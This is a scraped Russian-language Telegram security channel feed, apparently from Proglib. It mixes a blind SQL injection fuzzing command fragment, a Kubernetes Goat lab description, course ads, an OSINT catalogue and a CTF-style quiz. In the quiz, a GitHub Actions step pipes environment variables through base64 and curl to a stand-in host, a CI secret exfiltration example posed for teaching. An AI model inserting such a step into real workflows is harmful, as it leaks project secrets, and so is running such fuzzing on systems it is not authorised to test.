При поиске Blind SQL Injection не всегда есть ошибки в ответе приложения. Иногда единственный признак — увеличение времени ответа.
Команда для поиска параметров с задержкой:
-w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt \
-fc 404 \
-mt 5000
⚠️ Не забывайте исключать ложные срабатывания из-за медленных API, rate limiting и сетевых задержек.
#cheat_sheet
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3❤2
Forwarded from Азбука айтишника
Они прогрессируют, уже пытаются маскироваться под людей
🔹 Курс разработка AI-агентов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#небагафича
🔹 Курс разработка AI-агентов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#небагафича
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6❤3🔥2
Kubernetes Goat — это специально уязвимый Kubernetes-кластер для обучения безопасности на практике.
— ошибки RBAC и лишние привилегии
— уязвимые контейнеры
— небезопасные настройки кластера
— privilege escalation
— container escape
— практические сценарии для Red Team и Blue Team
Отличная площадка для изучения атак на Kubernetes в безопасной среде
#tool_of_the_week
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4👍3
⚡️ Продолжаем знакомить вас с экспертами курса AgentOps!
— Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов
— Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем
— Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена
— Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation
— Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры
Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса.
👉 Изучить обновленную программу AgentOps и занять место.
— Сергей Нотевский расскажет, как выстроить FinOps для AI-продуктов: оптимизировать затраты на разработку и продакшен, внедрить model routing, semantic cache и систему алертов для контроля расходов
— Эмиль Сатаев разберет Context Engineering: управление контекстом, защиту от prompt injection, работу с длинными контекстами и построение безопасного пайплайна входа для AI-систем
— Михаил Бондаревский покажет, как подготовить инфраструктуру для AI-агентов: Docker, sandboxing, streaming, docker-compose и воспроизводимое окружение для разработки и продакшена
— Мурат Хажгериев расскажет про Enterprise Integrations & MCP: когда MCP действительно нужен, как подключать внешние сервисы и реализовывать интеграции с OAuth2 delegation
— Герман Сабиров разберет Governance & Compliance для AI-систем: data flow, audit logs, требования 152-ФЗ, локализацию данных и построение compliance-подхода на уровне архитектуры
Курс для backend-разработчиков, тимлидов и LLM инженеров о том, как внедрять AI-логику в бэкенд IT-продуктов и сохранять стабильность сервиса.
👉 Изучить обновленную программу AgentOps и занять место.
❤3🌚2
Сценарий: в open source-репозиторий прилетает pull request с “безобидным” изменением GitHub Actions workflow.
Внутри добавили шаг:
- name: Debug publish run: | env | base64 | curl -s -X POST https://example[.]com/logs -d @-
Автор PR пишет:
«Оптимизировал publish pipeline и добавил debug output для диагностики релизов».
🔥 — Exfiltration of CI/CD secrets: workflow пытается вывести переменные окружения и секреты наружу.
👾 — Dependency confusion: пакет подтягивается из внешнего registry.
❤️ — Cache poisoning: атакующий подменяет build cache.
👍 — Path traversal: workflow читает файлы за пределами проекта.
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23❤3👍1👾1
В каталоге собрано более 1300 инструментов, разбитых на десятки категорий:
— Telegram
— Социальные сети
— Email и Username Search
— Геолокация
— Анализ доменов и IP
— Утечки данных
— Metadata Analysis
— Threat Intelligence
— поиск по инструментам;
— автоматическое обновление из GitHub;
— более 50 категорий;
— веб-версия, Android и desktop-клиент.
Полезная закладка для OSINT-специалистов, расследователей, багхантеров и пентестеров.
#resource_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2
Forwarded from Азбука айтишника
🐧 Шпаргалка по работе с утилитой cron и правам для файлов в Linux: на заметку этичному хакеру
🔹 Курс «Алгоритмы и структуры данных»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🏃♀️ Азбука айтишника
#магиякода
🔹 Курс «Алгоритмы и структуры данных»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#магиякода
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3🥱1💯1
😎 Знакомьтесь с экспертом Proglib.academy: Senior Software Engineer и Team Lead в Yandex Cloud Роман Барлос
Роман — консультант нашего курса «Разработка ИИ-агентов». Он работает на стыке cloud-native архитектуры и AI, активно внедряя современные ИИ-подходы в реальные процессы разработки.
За что его ценит IT-комьюнити?
🟣 Team Lead и AI-евангелист в команде UX Yandex Cloud
🟣 Техлид Sourcecraft Code Assistant
🟣 Создатель полезного Open Source
🟣 Автор интерактивных ML-визуализаций
Роман регулярно делится инженерными наработками, инсайтами и экспертизой в своем авторском Telegram-канале
На курсе Роман выступает консультантом программы: он помогает формировать содержание уроков с опорой на актуальные инженерные практики и жесткие требования индустрии.
Узнать больше о программе и разработке автономных систем:
👉 Курс «Разработка ИИ-агентов»
Так, продолжаем знакомить вас с командой?
👍 — Да, ждем новых лиц
🔥 — Жду полезные материалы от Романа
Роман — консультант нашего курса «Разработка ИИ-агентов». Он работает на стыке cloud-native архитектуры и AI, активно внедряя современные ИИ-подходы в реальные процессы разработки.
За что его ценит IT-комьюнити?
14-лет в разработке. Занимается AI-адопшеном в команде Yandex Cloud, проводит мастер-классы и продвигает лучшие практики для повышения эффективности разработчиков.
С сильным практическим бэкграундом принимал участие как технический лид в создании мощного AI-расширения для VS Code.
Разрабатывает утилиты, которые позволяют быстро начать эксперименты с инференсом и агентами в локальном окружении: например, набор скриптов vllm-setup для быстрого запуска окружения и mini-proxy — минималистичный прокси для OpenAI API провайдеров.
Объясняет сложные концепции наглядно. Создал серию залипательных обучающих материалов, где можно вживую пощупать работу сетей Хопфилда, машин Больцмана и VC-размерности.
Роман регулярно делится инженерными наработками, инсайтами и экспертизой в своем авторском Telegram-канале
На курсе Роман выступает консультантом программы: он помогает формировать содержание уроков с опорой на актуальные инженерные практики и жесткие требования индустрии.
Узнать больше о программе и разработке автономных систем:
👉 Курс «Разработка ИИ-агентов»
Так, продолжаем знакомить вас с командой?
👍 — Да, ждем новых лиц
🔥 — Жду полезные материалы от Романа
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2😢1
Полезный технический разбор про то, почему одной маскировки под TLS уже недостаточно.
В статье объясняют:
— как работает Fake-TLS в MTProto;
— почему JA3/JA4 fingerprint помогает находить неидеальный TLS;
— как DPI анализирует размеры пакетов, тайминги и keep-alive;
— почему зашифрованный payload всё равно оставляет сетевые метаданные;
— где упирается предел DPI из-за стоимости глубокого анализа.
#resource_drop
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2